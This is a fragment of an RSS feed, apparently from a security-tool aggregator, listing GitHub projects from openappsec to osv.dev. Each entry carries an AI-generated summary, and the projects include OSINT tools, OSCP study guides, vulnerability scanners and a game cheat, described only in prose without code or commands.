&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Open Source Security Guide serves as a comprehensive resource for enhancing the security of systems and networks by providing tutorials, standards, and tools relevant to open-source security practices. It includes sections on security certifications, threat models, and various security frameworks, along with a curated list of tools and resources to improve security operations. Notably, it aims to foster a collaborative environment for sharing best practices and advancing security through community initiatives.&lt;/p&gt;</description></item><item><title>openappsec</title><link>https://rainmana.github.io/hackyfeed/tools/openappsec-openappsec/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/openappsec-openappsec/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; open-appsec is a machine learning-based web application and API threat protection tool designed to guard against OWASP Top 10 vulnerabilities and zero-day attacks. It employs a dual-phase evaluation process using both supervised and unsupervised models to intelligently assess the legitimacy of HTTP requests based on user interaction patterns and predefined attack indicators. Notable features include support for deployment on Linux, Docker, and Kubernetes environments, along with flexible management options through declarative configuration, Helm charts, and a SaaS web interface.&lt;/p&gt;</description></item><item><title>openblack</title><link>https://rainmana.github.io/hackyfeed/tools/openblack-openblack/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/openblack-openblack/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; openblack is an open-source reimplementation of the classic game &amp;ldquo;Black &amp;amp; White&amp;rdquo; (2001), developed using modern C++ and contemporary rendering technologies like OpenGL and Vulkan. This tool primarily serves to allow users to experience the original gameplay while requiring the original game assets for operation. Noteworthy features include pre-built binaries for multiple platforms, including Windows, Linux, and macOS, along with experimental builds for additional architectures and devices.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="openblack"&gt;openblack&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/openblack/openblack/actions/workflows/ci-vcpkg.yml?query=branch%3Amaster+event%3Apush"&gt;&lt;img src="https://github.com/openblack/openblack/actions/workflows/ci-vcpkg.yml/badge.svg?branch=master&amp;amp;event=push" alt="VCPKG CI"&gt;&lt;/a&gt;
&lt;a href="https://github.com/openblack/openblack/actions/workflows/packaging.yml?query=branch%3Amaster+event%3Apush"&gt;&lt;img src="https://github.com/openblack/openblack/actions/workflows/packaging.yml/badge.svg?branch=master&amp;amp;event=push" alt="Packaging CI"&gt;&lt;/a&gt;
&lt;a href="https://github.com/openblack/openblack/stargazers"&gt;&lt;img src="https://img.shields.io/github/stars/openblack/openblack?logo=github" alt="GitHub Stars"&gt;&lt;/a&gt;
&lt;a href="https://discord.gg/5QTexBU"&gt;&lt;img src="https://img.shields.io/discord/608729286513262622?logo=discord&amp;amp;logoColor=white" alt="Discord chat"&gt;&lt;/a&gt;
&lt;a href="LICENSE.md"&gt;&lt;img src="https://img.shields.io/github/license/openblack/openblack" alt="License"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>opencve</title><link>https://rainmana.github.io/hackyfeed/tools/opencve-opencve/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/opencve-opencve/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OpenCVE is a Vulnerability Intelligence Platform designed to efficiently monitor and manage Common Vulnerabilities and Exposures (CVEs). It provides features such as aggregation from multiple sources, customizable filtering, alert subscriptions, and collaboration tools for tracking CVE progress within teams. Notable functionalities include AI-driven enrichment, customizable dashboards, and detailed reporting capabilities to streamline vulnerability management processes.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img alt="OpenCVE" src="https://raw.githubusercontent.com/opencve/opencve/v2/logo.png" width="400px;"&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
 &lt;a href="https://github.com/opencve/opencve/actions?query=workflow%3ATests"&gt;
 &lt;img alt="Tests" src="https://github.com/opencve/opencve/actions/workflows/tests.yml/badge.svg?branch=master"&gt;
 &lt;/a&gt;
 &lt;a href="https://www.python.org/"&gt;
 &lt;img alt="Python versions" src="https://img.shields.io/badge/python-3.10%2B-blue.svg"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/python/black"&gt;
 &lt;img alt="Code style: black" src="https://img.shields.io/badge/code%20style-black-000000.svg"&gt;
 &lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="what-is-opencve"&gt;What is OpenCVE?&lt;/h2&gt;
&lt;p&gt;OpenCVE is a Vulnerability Intelligence Platform that helps you monitor and manage CVEs efficiently.&lt;/p&gt;</description></item><item><title>opendbc</title><link>https://rainmana.github.io/hackyfeed/tools/commaai-opendbc/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/commaai-opendbc/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; opendbc is a Python API designed for interacting with automotive systems, enabling the control of vehicle functions such as steering, gas, and brakes, as well as reading vehicle data like speed and steering angle. Its primary use case is to facilitate the development and integration of advanced driver-assistance systems (ADAS) using the openpilot platform, while also expanding into broader automotive management capabilities. Notable features include support for parsing and building CAN messages via DBC files, a repository of compatible vehicle models, and a structured approach for adding new vehicle support and functionalities.&lt;/p&gt;</description></item><item><title>openhaystack</title><link>https://rainmana.github.io/hackyfeed/tools/seemoo-lab-openhaystack/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/seemoo-lab-openhaystack/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OpenHaystack is a framework designed for tracking personal Bluetooth devices through Apple&amp;rsquo;s Find My network, enabling users to create custom tracking tags for various physical objects. It utilizes a macOS application and custom firmware for Bluetooth devices, allowing them to be discoverable by nearby iPhones that can report their location without requiring cellular coverage. Notably, OpenHaystack leverages reverse-engineering and security analysis of Apple&amp;rsquo;s offline finding features, though it remains experimental and untested.&lt;/p&gt;</description></item><item><title>OpenPods</title><link>https://rainmana.github.io/hackyfeed/tools/adolfintel-openpods/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/adolfintel-openpods/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OpenPods is a free and open-source Android application designed for monitoring Apple AirPods connectivity and status. It features real-time notifications for connected AirPods, privacy-respecting functionality, and support for a dark theme, while being compatible with multiple generations of AirPods and Beats headphones. The tool explicitly violates Google Play policies, hence it is not intended for distribution on that platform.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;&lt;img src="fastlane/metadata/android/en-US/images/icon.png" width="150"&gt;&lt;/p&gt; 
&lt;h1 align="center"&gt;&lt;b&gt;OpenPods&lt;/b&gt;&lt;/h1&gt;
&lt;h4 align="center"&gt;The Free and Open Source app for monitoring your AirPods on Android&lt;/h4&gt;
&lt;p align="center"&gt;
	&lt;a href="https://github.com/adolfintel/OpenPods/releases"&gt;
		&lt;img src="https://img.shields.io/github/release/adolfintel/OpenPods.svg?color=blueviolet" alt="GitHub release"&gt;
	&lt;/a&gt;
	&lt;a href="https://www.gnu.org/licenses/gpl-3.0"&gt;
		&lt;img src="https://img.shields.io/badge/License-GPL%20v3-blue.svg" alt="License: GPLv3"&gt;
	&lt;/a&gt;
	&lt;img alt="Minimum SDK" src="https://img.shields.io/badge/API-26%2B-green"&gt;
&lt;/p&gt;</description></item><item><title>opensquat</title><link>https://rainmana.github.io/hackyfeed/tools/atenreiro-opensquat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/atenreiro-opensquat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; openSquat is an open-source intelligence (OSINT) tool designed to identify cyber squatting threats against brands or domains. It leverages advanced detection techniques, such as similarity detection using the Levenshtein distance algorithm, and integrates with services like VirusTotal for domain reputation checks. Key features include daily updates on newly registered domains, DNS validation, and multiple output formats, enhancing its utility for security professionals monitoring potential domain-related threats.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="https://raw.githubusercontent.com/atenreiro/opensquat/master/screenshots/openSquat_logo.png" alt="openSquat Logo" width="400"/&gt;
&lt;/p&gt;</description></item><item><title>OpenTendo</title><link>https://rainmana.github.io/hackyfeed/tools/redherring32-opentendo/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/redherring32-opentendo/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Open &amp;lsquo;Tendo is an open-source hardware project that recreates the original 1985 Front-Loading NES motherboard, focusing on documentation and preservation through reverse engineering. The repository provides comprehensive design files, including a bill of materials, schematics, and PCB layouts in KiCad format, while intentionally excluding modern video output improvements like RGB or HDMI. Users are encouraged to utilize the designs for personal projects, manufacturing replacement boards, or for further custom PCB work.&lt;/p&gt;</description></item><item><title>openwifipass</title><link>https://rainmana.github.io/hackyfeed/tools/seemoo-lab-openwifipass/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/seemoo-lab-openwifipass/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OpenWifiPass is an open-source implementation of the grantor role in Apple&amp;rsquo;s Wi-Fi Password Sharing protocol, designed for sharing Wi-Fi credentials (SSID and PSK) using Bluetooth Low Energy on Linux systems like the Raspberry Pi. It serves educational and experimental purposes, featuring a simple command-line interface to initiate the sharing process, although it currently lacks identity verification for requestors, posing security risks when handling sensitive credentials. Notably, the project includes a reusable OPACK (de)serializer for handling packet data, emphasizing its experimental nature and community-driven development.&lt;/p&gt;</description></item><item><title>operative-framework</title><link>https://rainmana.github.io/hackyfeed/tools/graniet-operative-framework/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/graniet-operative-framework/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Operative Framework is a digital investigation tool designed for interacting with multiple targets, executing a variety of modules, and managing links with these targets. Its notable features include the ability to export reports in PDF format, support for crafting custom modules, and a RESTful API for integration, all underpinned by a redesigned architecture in Rust for enhanced performance and functionality.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;img src="https://i.ibb.co/ZBf2T77/PNG.png" width="200"&gt;
&lt;p&gt;&lt;strong&gt;operative framework&lt;/strong&gt; is a digital investigation framework, you can interact with multiple targets, execute multiple modules, create links with target, export rapport to PDF file, add note to target or results, interact with RESTFul API, write your own modules.&lt;/p&gt;</description></item><item><title>OSCE3-Complete-Guide</title><link>https://rainmana.github.io/hackyfeed/tools/joasasantos-osce3-complete-guide/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/joasasantos-osce3-complete-guide/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The OSCE³ and OSEE Study Guide provides comprehensive resources for mastering web security concepts and techniques relevant to the Offensive Security Certified Expert (OSCE) and Offensive Security Exploitation Expert (OSEE) certifications. Its primary use case is to aid cybersecurity professionals in studying various attack vectors and methodologies, including but not limited to SQL injections, cross-site scripting, and remote code execution. Notable features include an extensive list of reference materials, as well as detailed discussions of numerous vulnerabilities and exploitation strategies.&lt;/p&gt;</description></item><item><title>OSCP</title><link>https://rainmana.github.io/hackyfeed/tools/0xsyr0-oscp/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0xsyr0-oscp/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The OSCP Cheat Sheet repository provides a comprehensive collection of essential commands and techniques specifically tailored for the Offensive Security Certified Professional (OSCP) exam. It includes updates on advanced exploitation methods such as Active Directory Certificate Services abuse and Shadow Credentials attacks, alongside practical resources for information gathering, vulnerability analysis, and exploitation strategies. The tool aims to assist users in navigating the exam requirements while emphasizing the importance of adhering to current exam guidelines.&lt;/p&gt;</description></item><item><title>OSCP</title><link>https://rainmana.github.io/hackyfeed/tools/ihack4falafel-oscp/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ihack4falafel-oscp/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The OSCP repository contains a collection of scripts and tools designed to assist in penetration testing and privilege escalation, particularly for the OSCP exam. Notable features include custom scripts for Linux privilege checks, port knocking, cron job analysis, and a comprehensive Windows privilege escalation check, along with a SQL injection cheatsheet for manual exploitation techniques. This repository is aimed at providing streamlined and efficient tools for security practitioners during their testing processes.&lt;/p&gt;</description></item><item><title>OSCP-Exam-Report-Template</title><link>https://rainmana.github.io/hackyfeed/tools/whoisflynn-oscp-exam-report-template/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/whoisflynn-oscp-exam-report-template/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The OSCP Exam Report Template provides structured templates for documenting OSCP Lab and Exam reports, designed to reduce the anxiety associated with report writing. Notable features include a detailed Table of Contents, machine-specific sections with links for easy navigation, and additional headers for crucial elements such as scan results and proof documentation. The template facilitates a comprehensive and organized representation of a penetration testing process following the OSCP guidelines.&lt;/p&gt;</description></item><item><title>OSCP-Exam-Report-Template-Markdown</title><link>https://rainmana.github.io/hackyfeed/tools/noraj-oscp-exam-report-template-markdown/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/noraj-oscp-exam-report-template-markdown/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The OSCP Exam Report Template in Markdown is designed to streamline the report writing process for Offensive Security exams, eliminating the need for traditional word processors like LaTeX and Microsoft Word. It allows users to write reports in Markdown, which enhances efficiency, reduces formatting issues, and integrates version control capabilities. Notable features include a script for automatic report generation, support for various text editors, and a clean, professional layout for certification documentation.&lt;/p&gt;</description></item><item><title>OSCP-Human-Guide</title><link>https://rainmana.github.io/hackyfeed/tools/six2dez-oscp-human-guide/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/six2dez-oscp-human-guide/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The OSCP-Human-Guide is a personal guide tailored for preparing for the Offensive Security Certified Professional (OSCP) exam, featuring a collection of resources, strategies, and mock exam frameworks. Its primary use case is to assist aspiring penetration testers in navigating lab environments and exam simulations effectively. Notable features include detailed walkthroughs of lab machines, advice on exam preparation, and a CherryTree template for organization of findings.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="oscp-human-guide"&gt;OSCP-Human-Guide&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;
I&amp;rsquo;m currently moving all the OSCP stuff and other things to my &amp;ldquo;&lt;a href="https://six2dez.gitbook.io/pentest-book/"&gt;pentest-book&lt;/a&gt;&amp;rdquo;. This repository will not have more updates. Sorry for the inconvenience.&lt;/p&gt;</description></item><item><title>OSCP-Tricks</title><link>https://rainmana.github.io/hackyfeed/tools/rodolfomarianocy-oscp-tricks/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rodolfomarianocy-oscp-tricks/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OSCP Tricks is a comprehensive resource designed to assist penetration testers preparing for the Offensive Security Certified Professional (OSCP) exam. It encompasses various techniques across critical areas such as information gathering, web application attacks, privilege escalation on both Linux and Windows systems, and more, supplemented with external links to useful tutorials and methodologies. Notable features include categorized attack vectors, detailed enumeration guides, and checklists to streamline the penetration testing process.&lt;/p&gt;</description></item><item><title>osi.ig</title><link>https://rainmana.github.io/hackyfeed/tools/th3unkn0n-osi.ig/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/th3unkn0n-osi.ig/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OSI.IG is an open-source tool designed for conducting Open Source Intelligence (OSINT) on Instagram accounts by retrieving detailed user information, including profile data, hashtags, mentions, and post metadata. Notable features include the ability to extract user ID, follower counts, and engagement metrics, as well as accessing post details, although it currently struggles with posts marked as sensitive content. The tool aims to work without login credentials, providing a streamlined method for information gathering on Instagram profiles.&lt;/p&gt;</description></item><item><title>osint-brazuca</title><link>https://rainmana.github.io/hackyfeed/tools/osintbrazuca-osint-brazuca/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/osintbrazuca-osint-brazuca/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OSINT Brazuca is a comprehensive repository designed to aggregate open-source intelligence (OSINT) resources specifically relevant to Brazil. Its primary use case is to facilitate the gathering and analysis of publicly available information from various websites and portals, enhancing research and investigative efforts in fields like journalism and cybersecurity. Notable features include a structured collection of sources, adherence to legal guidelines such as the Brazilian General Data Protection Law (LGPD), and best practice recommendations for ethical information use.&lt;/p&gt;</description></item><item><title>osint-brazuca-regex</title><link>https://rainmana.github.io/hackyfeed/tools/osintbrazuca-osint-brazuca-regex/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/osintbrazuca-osint-brazuca-regex/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OSINT Brazuca Regex is a repository designed to compile an extensive set of regular expressions tailored for open-source intelligence (OSINT) purposes, specifically focusing on data pertinent to Brazil. It encompasses regex patterns for various categories such as personal identification documents, cryptocurrency wallets, and banking information, all provided in a convenient JSON format for easy integration into tools and scripts. Notable features include coverage of Brazilian documents like CPF and CNPJ, as well as generic regex applicable across different contexts.&lt;/p&gt;</description></item><item><title>OSINT-Cheat-sheet</title><link>https://rainmana.github.io/hackyfeed/tools/jieyab89-osint-cheat-sheet/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jieyab89-osint-cheat-sheet/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The OSINT Cheat Sheet is a comprehensive resource that aggregates various open-source intelligence (OSINT) tools, datasets, and tips for effective information gathering. It serves as an educational guide, emphasizing safe usage practices and the importance of risk management when utilizing both free and paid tools. Notably, it includes advice on using virtual environments, enhancing privacy measures, and strategies for engaging with OSINT resources responsibly.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="osint-cheat-sheet---list-osint-tools-github-badge"&gt;OSINT CHEAT SHEET - List OSINT Tools &lt;a href="https://github.com/Jieyab89"&gt;&lt;img src="https://img.shields.io/badge/-Jieyab89-black?style=flat&amp;amp;logo=github&amp;amp;logoColor=white&amp;amp;link=https://github.com/Jieyab89/" alt="Github Badge"&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://github.com/user-attachments/assets/6f1fbfe1-11a4-4c1b-b5fd-669107197ca2" alt="image"&gt;&lt;/p&gt;</description></item><item><title>OSINT-Framework</title><link>https://rainmana.github.io/hackyfeed/tools/lockfale-osint-framework/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lockfale-osint-framework/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The OSINT Framework is a comprehensive resource designed to assist users in gathering information from free online sources for open-source intelligence (OSINT) applications. Its primary use case is to facilitate the discovery of various tools and resources that aid in information security and beyond, while notable features include a structured categorization of tools, some requiring local installation, and links to Google Dorking resources. The framework encourages community contributions for expanding its database of OSINT resources.&lt;/p&gt;</description></item><item><title>osint-tools</title><link>https://rainmana.github.io/hackyfeed/tools/howtofind-bot-osint-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/howtofind-bot-osint-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The OSINT tools repository provides a comprehensive collection of 308 scripts and tools designed for Open Source Intelligence (OSINT) investigations. Users can select tools based on various input data types across numerous categories, including account identifiers, file types, and network analysis. Notable features include easy navigation through categorized tools and the ability to access the latest version of each tool by modifying the repository commit reference.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="osint-tools"&gt;OSINT tools&lt;/h1&gt;
&lt;p&gt;Various OSINT tools and scripts, total 308 repos.&lt;/p&gt;</description></item><item><title>OSINT-Tools</title><link>https://rainmana.github.io/hackyfeed/tools/digitaldisarray-osint-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/digitaldisarray-osint-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OSINT-Tools is a curated collection of open-source intelligence (OSINT) tools aimed at facilitating the gathering and analysis of publicly available information. It includes a variety of tools for data extraction, reconnaissance, metadata analysis, and geolocation, with notable options like Maltego for link analysis, Recon-ng for web-based reconnaissance, and SpiderFoot for footprinting. The repository encourages contributions through pull requests, providing a collaborative platform for enhancing OSINT resources.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="osint-tools"&gt;OSINT-Tools&lt;/h1&gt;
&lt;p&gt;:eyes: Some of my favorite OSINT tools.&lt;/p&gt;</description></item><item><title>Osintgram</title><link>https://rainmana.github.io/hackyfeed/tools/datalux-osintgram/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/datalux-osintgram/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Osintgram is a Python-based OSINT tool designed for reconnaissance on Instagram, enabling users to collect and analyze public data from Instagram accounts by username. Key features include retrieving followers, followed accounts, post information, comments, captions, and downloading media such as photos and stories. The tool operates through an interactive shell, providing a comprehensive suite of commands for in-depth investigation while emphasizing the importance of ethical usage.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="osintgram-"&gt;Osintgram 🔎📸&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/Datalux/Osintgram/releases/tag/1.3"&gt;&lt;img src="https://img.shields.io/badge/version-1.3-green" alt="version-1.3"&gt;&lt;/a&gt;
&lt;a href="https://img.shields.io/badge/license-GPLv3-blue"&gt;&lt;img src="https://img.shields.io/badge/license-GPLv3-blue" alt="GPLv3"&gt;&lt;/a&gt;
&lt;a href="https://img.shields.io/badge/language-Python3-red"&gt;&lt;img src="https://img.shields.io/badge/language-Python3-red" alt="Python3"&gt;&lt;/a&gt;
&lt;a href="https://t.me/osintgram"&gt;&lt;img src="https://img.shields.io/badge/Telegram-Channel-blue.svg" alt="Telegram"&gt;&lt;/a&gt;
&lt;a href="https://img.shields.io/badge/Docker-Supported-blue"&gt;&lt;img src="https://img.shields.io/badge/Docker-Supported-blue" alt="Docker"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Osiris</title><link>https://rainmana.github.io/hackyfeed/tools/danielkrupinski-osiris/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/danielkrupinski-osiris/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Osiris is a cross-platform game hacking tool designed for Counter-Strike 2, featuring a graphical user interface based on the game&amp;rsquo;s Panorama UI. Its primary use case is to enhance gameplay through various functions such as customizable visual indicators for bomb planting and inaccuracy visualizations without relying on traditional C++ runtime libraries or external dependencies. Notable features include customizable color schemes for game elements, enhanced player information rendering, and support for both Windows and Linux compilation.&lt;/p&gt;</description></item><item><title>osmedeus</title><link>https://rainmana.github.io/hackyfeed/tools/j3ssie-osmedeus/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/j3ssie-osmedeus/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Osmedeus is a security-focused orchestration engine designed for automating complex workflows through declarative YAML definitions, enhancing the audibility and management of security tasks. It features distributed execution, a rich library of over 80 utility functions, and supports cloud infrastructure provisioning for robust penetration testing and scanning. Key functionalities include event-driven scheduling, agentic LLM integration for tool orchestration, and a REST API for seamless integration and visualization through a web interface.&lt;/p&gt;</description></item><item><title>ossa</title><link>https://rainmana.github.io/hackyfeed/tools/bloodzer0-ossa/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bloodzer0-ossa/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Ossa is an open-source security architecture tool designed to assist small to medium-sized enterprises in implementing security measures through accessible tools and resources. Its primary use case is to guide users in the installation and practical application of various security tools to address common vulnerabilities and improve overall security posture. Notable features include a focus on application security fundamentals, intrusion detection, and detailed documentation on tool usage, aimed at enhancing security for organizations lacking dedicated security personnel.&lt;/p&gt;</description></item><item><title>osv-scanner</title><link>https://rainmana.github.io/hackyfeed/tools/google-osv-scanner/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/google-osv-scanner/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OSV-Scanner is a tool designed to identify vulnerabilities in project dependencies by leveraging the OSV database through a user-friendly CLI interface. It supports a diverse range of programming languages, package managers, and includes features such as vulnerability detection in container images and guided remediation recommendations based on various criteria. The tool&amp;rsquo;s extensibility and comprehensive data sourcing improve the accuracy and effectiveness of vulnerability notifications for developers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;picture&gt;
 &lt;source srcset="https://rainmana.github.io/hackyfeed/docs/images/osv-scanner-full-logo-darkmode.svg" media="(prefers-color-scheme: dark)"&gt;
 &lt;!-- markdown-link-check-disable-next-line --&gt;
 &lt;img src="https://rainmana.github.io/hackyfeed/docs/images/osv-scanner-full-logo-lightmode.svg"&gt;
&lt;/picture&gt;
&lt;hr&gt;
&lt;p&gt;&lt;a href="https://scorecard.dev/viewer/?uri=github.com/google/osv-scanner"&gt;&lt;img src="https://api.securityscorecards.dev/projects/github.com/google/osv-scanner/badge" alt="OpenSSF Scorecard"&gt;&lt;/a&gt;
&lt;a href="https://goreportcard.com/report/github.com/google/osv-scanner"&gt;&lt;img src="https://goreportcard.com/badge/github.com/google/osv-scanner" alt="Go Report Card"&gt;&lt;/a&gt;
&lt;a href="https://codecov.io/gh/google/osv-scanner"&gt;&lt;img src="https://codecov.io/gh/google/osv-scanner/graph/badge.svg?token=C8IDVX9LP5" alt="codecov"&gt;&lt;/a&gt;
&lt;a href="https://slsa.dev"&gt;&lt;img src="https://slsa.dev/images/gh-badge-level3.svg" alt="SLSA 3"&gt;&lt;/a&gt;
&lt;a href="https://github.com/google/osv-scanner/releases"&gt;&lt;img src="https://img.shields.io/github/v/release/google/osv-scanner" alt="GitHub Release"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>osv.dev</title><link>https://rainmana.github.io/hackyfeed/tools/google-osv.dev/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/google-osv.dev/</guid><description>&lt;blockquote&gt;
